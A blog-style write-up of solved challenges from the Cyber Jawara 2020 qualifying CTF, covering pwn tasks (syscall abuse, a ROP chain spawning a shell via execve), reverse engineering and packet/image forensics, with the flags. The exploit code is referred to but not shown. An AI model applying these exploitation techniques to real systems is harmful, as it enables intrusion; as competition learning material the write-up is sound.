Cyber Jawara 2020 Quals
cyber jawara is a hacking competition on a national scale from Indonesia, in this article, I will explain some challenge that I solved during the competition
Syscall | Pwn
Description
Syscall adalah salah satu pondasi yang penting dalam sistem operasi. Oleh karena itu, mengetahui tentang syscall adalah wajib dalam melakukan riset binary exploitation ataupun riset keamanan sistem operasi.
Berikut adalah layanan yang akan menjalankan syscall pada sistem Linux x86 64 bit.
nc pwn.cyber.jawara.systems 13371
Solution
we were given a service that we have to input a syscall number and 5 arguments, since the program leak the flag address, so we can just using write syscall to print the flag.
FLAG: CJ2020{penting_loh_orang_security_tau_syscall}
ROP | Pwn
Description
Return Oriented Programming (ROP) adalah salah satu trik yang biasa digunakan untuk mengeksekusi kode ketika instruction pointer sudah dapat dikontrol namun memasukkan/mengeksekusi shellcode tidak memungkinkan. Ide dasar ROP adalah menggunakan potongan-potongan instruksi mesin pada binary ataupun library yang mengandung ret (return) atau call (termasuk syscall) yang biasa disebut dengan ROP gadgets. Gadgets tersebut disusun sedemikian rupa sehingga instruksi bisa lompat-lompat dan pada akhirnya mengeksekusi perintah yang kita inginkan.
Berikut adalah layanan yang memilik celah buffer overflow tanpa proteksi canary (stack protector) sehingga Anda dapat meng-overwrite instruction pointer mulai dari bytes ke-17 input. Binary ini di-compile secara statically-linked, tetapi Anda tidak punya akses ke binary-nya. Yang Anda dapatkan hanya informasi mengenai binary ELF tersebut dan juga kumpulan alamat gadgets yang bisa Anda gunakan.
nc pwn.cyber.jawara.systems 13372
Solution
another service only challenges, in this challenge we were given 2 files one is binary information
and a file that contains a lot of gadget address. since we can control the instruction pointer and
we already know that the binary has buffer overflow vulnerability, we can create an ROP chain to
call execve() and spawn a shell. we can use gadget mov qword ptr [rdx], rax ; ret
to store string
/bin/sh
inside bss segment. this is my exploit for this challenge.
FLAG: CJ2020{belajar_bikin_ropchain_sendiri_dong}
RANJAU | Pwn
Description
Mari bermain permainan yang sulit! Diberikan petak 4x4. Di setiap giliran, Anda harus memilih satu petak yang aman dari ranjau. Tentunya posisi ranjau selalu diacak layaknya game minesweeper. Flag akan ditampilkan ketika Anda berhasil bertahan hingga 8 giliran.
nc pwn.cyber.jawara.systems 13373
Solution
unfortunately, I didn’t solve this challenge during the competition due to some reason. in this challenge, we have to choose the right position and avoid the mine for 8 times.
after we solve 8 times, we can get the flag from the win()
function. to solve this
challenge I made a simple script to find the right input.
after we found the right input '}
we can input that string 8 times to get the flag
FLAG: CJ2020{hacker_beneran_nge-cheat_pakai_exploit_sendiri}
BabyBaby | Reverse Engineering
Description
Binary ini dapat digunakan untuk permulaan belajar reverse engineering.
Tips: Soal ini lebih mudah dikerjakan dengan static analysis seperti menggunakan Ghidra (gratis) atau IDA Pro (berbayar) dengan meng-generate kode C-like dari kode mesin yang ada di dalam binary.
Solution
we were given a binary, here is the pseudocode of that binary
as you can see, we have to find the correct number for the v4 v3 v6 variable. to find the correct number I use z3
run the program and we got the correct number
now, let’s input the correct number to the binary
FLAG: CJ2020{b4A4a4BBbb7yy}
Holmes Code | Reverse Engineering
Description
This Code Secret Dr. Watson to Holmes, Please check message on the Code
Solution
in these challenges, we were given a bunch of binary. 288 in total, every binary typically does the same thing. but if we look closely
as you can see on address 0x6000c9
and 0x6000cc
has a different value
for every binary, to solve this challenge we can grab the value on
0x06000cc cmp dl, 0xec
and subtract with 0x1e
, and so on.
we can just follow the asm instruction for other binary. here is my solver code
to solve this challenge
run and we got the flag
FLAG: CJ2020{A_ScaNdal_in_B0h3mia}
Home Sherlock | Reverse Engineering
Description
Number Home Sherlock Holmes ? Please check on the File Download home : https://drive.google.com/file/d/14P7xZ4XIsEm6HU5WMvOVw6E0BFRH6CuH/view
Solution
we were given a compiled golang binary. this is a simple challenge, we solve it by doing static analysis on main function.
as you can see, we can use 44400444004440044
as our input
after we input the correct number, we got a string that encoded with base64, just decode the base64 and we got the flag
FLAG: CJ2020{221B_Baker_Str33t}
FTP | Forensic
Description
Potongan paket jaringan berikut berisi beberapa paket data yang terdiri dari berbagai komunikasi protokol, termasuk FTP. Sepertinya ada hal menarik yang bisa Anda ketahui dari situ.
Solution
we were given a .pcap
file, that contains some FTP communication. this is an easy challenge,
to solve this challenge we have to collect all the data from the FTP-DATA
protocol
as you can see there is a format flag C
in a0, to get the flag we have to collect
all the data and then order the data by its info
run and we got the flag
FLAG: CJ2020{plzuse_tls_kthxx}
Image PIX | Forensic
Description
Secret Message From Jim Moriarty to Holmes in Image
Solution
this is also a simple challenge, in order to get the flag we have to extract the RGBA value from this image
run and we got the flag
FLAG: CJ2020{A_Study_in_Scarlet}